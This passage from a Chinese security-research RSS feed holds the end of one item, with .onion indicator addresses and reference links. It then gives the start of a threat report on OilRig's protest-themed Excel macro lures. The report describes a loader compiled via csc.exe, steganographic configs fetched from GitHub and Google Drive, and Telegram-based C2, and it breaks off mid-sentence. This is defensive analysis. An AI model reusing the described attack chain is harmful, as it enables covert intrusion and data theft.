mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 15px;">imnlyhj4mtmtesqrvf7c4ma6dkxeyxw3ae53w6fuz42spndg7zpat6qd.onion</span></span></p><p style="margin-top: 8px;margin-bottom: 8px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 15px;">2zrek3mkl72d5b6evpkx2rz2glzrltiorgblpfb2ttg6lacwlsdk4iqd.onion</span></span></p><p style="margin-top: 8px;margin-bottom: 8px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 15px;">nytiplwknkinobjaeb5tajjiglip3vtaccju6ta7d47u5u64ktrwhrqd.onion</span></span></p><p style="margin-top: 8px;margin-bottom: 8px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 15px;">3xl6xhboulyuez6fuydyhj7pdvkshzn4ogsmgwbb3ukrkvgi6bcwvfyd.onion</span></span></p><p style="margin-top: 8px;margin-bottom: 8px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 15px;">e3mnde5uyuxjoztup6t3m7nykbicexbzra76ucligwgsaez65w63y2ad.onion</span></span></p><div data-role="outer" label="edit by 135editor" data-pm-slice="0 0 []"><div data-role="title" data-tools="135编辑器" data-id="85638" style=""><div style="margin: 2em auto 0px;padding: 0.5em 0px;white-space: normal;border-right: none;border-bottom: none;border-left: none;border-image: initial;border-top: 1px solid rgb(204, 204, 204);display: block;font-size: 15px;font-style: normal;font-weight: inherit;text-decoration: inherit;color: rgb(166, 166, 166);box-sizing: border-box;font-family:inherit;"><p style="margin-top: -1.2em;text-align: center;padding: 0px;border: none;line-height: 1.4;box-sizing: border-box;"><span style="font-size:15px;"><strong><span style="background-color: rgb(15, 15, 25);border-color: rgb(183, 184, 184);color: rgb(255, 255, 255);font-style: normal;padding: 8px 23px;text-align: center;text-decoration: inherit;font-family:inherit;"><span leaf="">参考链接</span></span></strong></span></p></div></div></div><p style="margin-top: 8px;margin-bottom: 8px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 15px;">[1]</span></span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 15px;"><a href="https://cert.gov.ua/article/6281701" target="_blank">https://cert.gov.ua/article/6281701</a></span></span><o:page></o:page></p><p style="margin-top: 8px;margin-bottom: 8px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 15px;">[2]</span></span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 15px;"><a href="https://securityonline.info/sandworm-apt-attacks-belarus-military-with-lnk-exploit-and-openssh-over-tor-obfs4-backdoor/" target="_blank">https://securityonline.info/sandworm-apt-attacks-belarus-military-with-lnk-exploit-and-openssh-over-tor-obfs4-backdoor/</a></span></span></p><p style="margin-top: 8px;margin-bottom: 8px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 15px;">[3]</span></span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 15px;"><a href="https://cloud.google.com/blog/topics/threat-intelligence/apt29-domain-frontin/" target="_blank">https://cloud.google.com/blog/topics/threat-intelligence/apt29-domain-frontin/</a></span></span></p><div data-role="outer" label="Powered by 135editor.com" style="" data-pm-slice="0 0 []"><div data-tools="135编辑器" data-id="96036"><div style="margin:10px auto;"><div data-autoskip="1" style="font-size: 14px;text-align: justify;letter-spacing: 1.5px;line-height: 1.75em;color: #3e3e3e;"><p style="line-height: 1.6em;"><span style="text-shadow: none;color: rgb(190, 25, 31);font-size: 15px;"><strong><span leaf="">360高级威胁研究院</span></strong></span></p><p hm_fix="392:393"><span style="color: #888888;font-size: 14px;letter-spacing: 0.544px;text-align: justify;text-decoration-thickness: initial;display: inline !important;font-family:微软雅黑, sans-serif;"><span leaf="">360高级威胁研究院是360数字安全集团的核心能力支持部门，由360资深安全专家组成，专注于高级威胁的发现、防御、处置和研究，曾在全球范围内率先捕获双杀、双星、噩梦公式等多起业界知名的0day在野攻击，独家披露多个国家级APT组织的高级行动，赢得业内外的广泛认可，为360保障国家网络安全提供有力支撑。</span></span></p></div></div></div><o:page></o:page></div><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=652f6586&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzUyMjk4NzExMA%3D%3D%26mid%3D2247508435%26idx%3D1%26sn%3D4bf6b56ed07bc47e05e6e64765a5a1bb">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Tue, 21 Apr 2026 17:47:00 +0800</pubDate>
    </item>
    <item>
      <title>APT-C-49（OilRig）以伊朗最新社会热点事件为诱饵的多阶段钓鱼攻击活动分析</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzUyMjk4NzExMA==&amp;mid=2247508255&amp;idx=1&amp;sn=b3b6cc3d274945427e44605621251b68</link>
      <description>360高级威胁研究院在APT威胁狩猎中发现该组织以伊朗全国热点性抗议事件为相关诱饵的多个攻击样本</description>
      <content:encoded><![CDATA[<p>原创 <span>高级威胁研究院</span> <span>2026-04-09 18:02</span> <span style="display: inline-block;">北京</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=8ad33b49&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FEmmib7pWXrXLRUNiaS0G9yMR3ob4Fjc4hKXTac4oxAhMeYPibQlCCh5Fn9ppNtQVp1icicefAL6MUByF2Gc7Pj38qDbIO8EQCKxwm0OToeSZHlFU%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>360高级威胁研究院在APT威胁狩猎中发现该组织以伊朗全国热点性抗议事件为相关诱饵的多个攻击样本</p>
  <div data-role="outer" label="edit by 135editor" data-pm-slice="0 0 []"><div><div><div><div><div data-role="outer" label="Powered by 135editor.com" style="" data-pm-slice="0 0 []"><div data-tools="135编辑器" data-id="102539"><div style="margin: 10px auto;text-align: left;"><div style="background: #f2f2f2;"><div style="box-sizing: border-box;padding:1em 1em;"><div style="display: flex;justify-content:  space-between;align-items: flex-end;" hm_fix="312:231"><div style="display: flex;justify-content: space-between;flex-direction: column;align-items: flex-start;border-left: 4px solid #be191f;box-sizing: border-box;"><p data-brushtype="text" style="font-size: 16px;letter-spacing: 1.5px;padding: 0px 0em 3px;color: #322828;margin-left: 12px;border-bottom: 1px solid #be191f;font-style: italic;box-sizing: border-box;"><span style="font-size: 18px;"><strong><span leaf="">APT-C-49</span></strong></span></p><p data-brushtype="text" style="letter-spacing: 1.5px;padding: 4px 0em 0px;color: #be191f;font-style: italic;box-sizing: border-box;"><span style="font-size: 18px;"><strong><span leaf="">OilRig</span></strong></span></p></div></div><div data-autoskip="1"><p style="text-indent: 2em;margin-top: 16px;margin-bottom: 8px;text-align: justify;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">APT-C-49（OilRig）</span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;,&#34;style&#34;:&#34;&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-tools&#34;:&#34;135编辑器&#34;,&#34;data-id&#34;:&#34;102539&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin: 10px auto;text-align: left;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;background: #f2f2f2;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;box-sizing: border-box;padding:1em 1em;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-autoskip&#34;:&#34;1&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;text-indent: 2em;margin-top: 16px;margin-bottom: 8px;text-align: justify;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]">又称APT34、</span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">Helix Kitten等，是一个与伊朗情报机构关联的高级持续性威胁（APT）组织，其攻击活动于2016年首次公开披露。该组织主要针对中东地区、美国、欧洲及亚洲部分国家，攻击目标涵盖政府、金融、能源、电信及化工等数十个关键行业，以窃取敏感的政治决策、地缘战略及军事能源领域的机密信息为主要目的。</span></p></div></div></div></div></div><div data-role="paragraph"><div style="text-align: left;margin: 10px auto;" data-pm-slice="0 0 []"><div style="background: linear-gradient(to bottom,rgba(254,254,254,0) 0%,rgba(254,254,254,0) 60%,#ffffff 60%,#ffffff 100%);"><div style="display: inline-block;"><div style="background-color: #be191f;padding: 6px 15px;box-sizing:border-box;"><p data-brushtype="text" style="font-size: 18px;letter-spacing: 1.5px;color: #ffffff;"><strong><span style="font-size:18px;"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;text-align: left;margin: 10px auto;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;background: linear-gradient(to bottom,rgba(254,254,254,0) 0%,rgba(254,254,254,0) 60%,#ffffff 60%,#ffffff 100%);&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;display: inline-block;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;background-color: #be191f;padding: 6px 15px;box-sizing:border-box;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-brushtype&#34;:&#34;text&#34;,&#34;style&#34;:&#34;font-size: 18px;letter-spacing: 1.5px;color: #ffffff;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;strong&#34;,&#34;attributes&#34;:{},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-size:18px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]">一、概述</span></span></strong></p></div></div></div></div><p style="text-indent: 2em;margin-top: 16px;margin-bottom: 16px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">近期，360高级威胁研究院在APT威胁狩猎中发现该组织以伊朗全国热点性抗议事件为相关诱饵的多个攻击样本，这些样本以excel文件为入口，通过编译释放的C#源码生成恶意加载器。该加载器依次访问GitHub仓库获取配置数据、解析指向Google Drive的图片链接，并运用LSB隐写技术从图像中提取加密配置信息，最终解密后续模块下载链接，实现多阶段载荷动态加载与Telegram Bot通道的加密C2通信，形成高度隐蔽的云滥用+隐写+内存执行攻击链。</span></p></div></div></div></div></div></div></div><div data-role="outer" label="edit by 135editor" data-pm-slice="0 0 []"><div style="text-align: left;margin: 10px auto;"><div style="background: linear-gradient(to bottom,rgba(254,254,254,0) 0%,rgba(254,254,254,0) 60%,#ffffff 60%,#ffffff 100%);"><div style="display: inline-block;"><div style="background-color: #be191f;padding: 6px 15px;box-sizing:border-box;"><p data-brushtype="text" style="font-size: 18px;letter-spacing: 1.5px;color: #ffffff;"><strong><span style="font-size:18px;"><span leaf="">二、攻击活动分析</span></span></strong></p></div></div></div></div></div><h2 style="margin-bottom: 16px;margin-top: 16px;"><span leaf="" style="font-family: 黑体;font-variant: normal;text-transform: none;"><span textstyle="" style="font-size: 17px;color: rgb(190, 25, 31);font-weight: bold;">1.</span></span><span leaf="" style="font-family: 黑体;font-variant: normal;text-transform: none;"><span textstyle="" style="font-size: 17px;color: rgb(190, 25, 31);font-weight: bold;">攻击流程分析</span></span></h2><p style="text-indent: 2em;margin-top: 16px;margin-bottom: 16px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">OilRig组织近期以伊朗全国性抗议事件为相关主题的钓鱼攻击中，投放了高度隐蔽的Excel宏文档，这些样本利用社会热点事件（如“</span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">德黑兰xx名单、最终名单_德黑兰xx.xlsm</span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">”等）伪装诱饵，诱导目标启用宏后触发多阶段感染链：首先通过VBA宏从CustomXMLParts解码出C#源代码，现场调用csc.exe编译成恶意加载器；该加载器启动后访问硬编码的GitHub仓库，从中读取经编码的配置数据，解析得到Google Drive共享链接；链接指向一张看似普通的图片，但内部采用LSB（最低有效位）隐写技术嵌入加密配置；加载器提取并解密配置后，获取多个后续模块的下载地址，逐一下载并动态加载窃密、命令执行等功能模块，最终通过Telegram Bot API建立加密C2通道，实现命令控制、数据窃取与回传。流程如下所示：</span><o:page></o:page></p><p style="text-align:center;"><span style="font-family:等线;mso-ascii-font-family:等线;mso-fareast-font-family:等线;font-variant:normal;text-transform:none;"><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.5432579890880749" data-w="1283" style="width:553.739990234375px;height:300.79998779296875px;" src="https://wechat2rss.xlab.app/img-proxy/?k=3049a674&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FEmmib7pWXrXJu4KvmmnBibVLMWawNthNxX6Raicqfn9G61MEtXLdOHr66gfRrDm3ULKC226TqWYBc2CXaX252wunUmQFNuc94DicGulOY7BRq54%2F640%3Fwx_fmt%3Dpng"/><img class="rich_pages wxw-img" data-src=""/></span></span></p><h2 style="margin-bottom: 16px;margin-top: 16px;"><span leaf="" style="font-family: 黑体;font-variant: normal;text-transform: none;"><span textstyle="" style="font-size: 17px;color: rgb(190, 25, 31);font-weight: bold;">2.</span></span><span leaf="" style="font-family: 黑体;font-variant: normal;text-transform: none;"><span textstyle="" style="font-size: 17px;color: rgb(190, 25, 31);font-weight: bold;">载荷投递分析</span></span></h2><p><table style="width:521px;"><tbody><tr><td data-colwidth="116" align="center" style="border-color:#000000;"><p><span leaf=""><span textstyle="" style="font-size: 17px;">MD5</span></span></p></td><td data-colwidth="405" style="border-color:#000000;"><p><span leaf=""><span textstyle="" style="font-size: 17px;">717da2804144e9759c4e6409f18b7b4b</span></span></p></td></tr><tr><td data-colwidth="116" align="center" style="border-color:#000000;"><p><span leaf=""><span textstyle="" style="font-size: 17px;">文件名称</span></span></p></td><td data-colwidth="405" style="border-color:#000000;"><p><span leaf=""><span textstyle="" style="font-size: 17px;">یست نهایی_جانباختگان_دی_1404_تهران_بخش دوم.xlsm</span></span></p></td></tr><tr><td data-colwidth="116" align="center" style="border-color:#000000;"><p><span leaf=""><span textstyle="" style="font-size: 17px;">文件大小</span></span></p></td><td data-colwidth="405" style="border-color:#000000;"><p><span leaf=""><span textstyle="" style="font-size: 17px;">724字节</span></span></p></td></tr></tbody></table></p><h2 style="text-indent: 2em;margin-top: 16px;margin-bottom: 16px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">“</span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">یست</span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">نهایی</span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">_</span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">جانباختگان</span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">_</span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">دی</span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">_1404_</span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">تهران</span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">_</span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">بخش</span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">دوم</span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">.xlsm”是一个携带宏代码的恶意文件，翻译为“最终名单_德黑兰xxxx.xlsm”。伊朗历1404</span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, 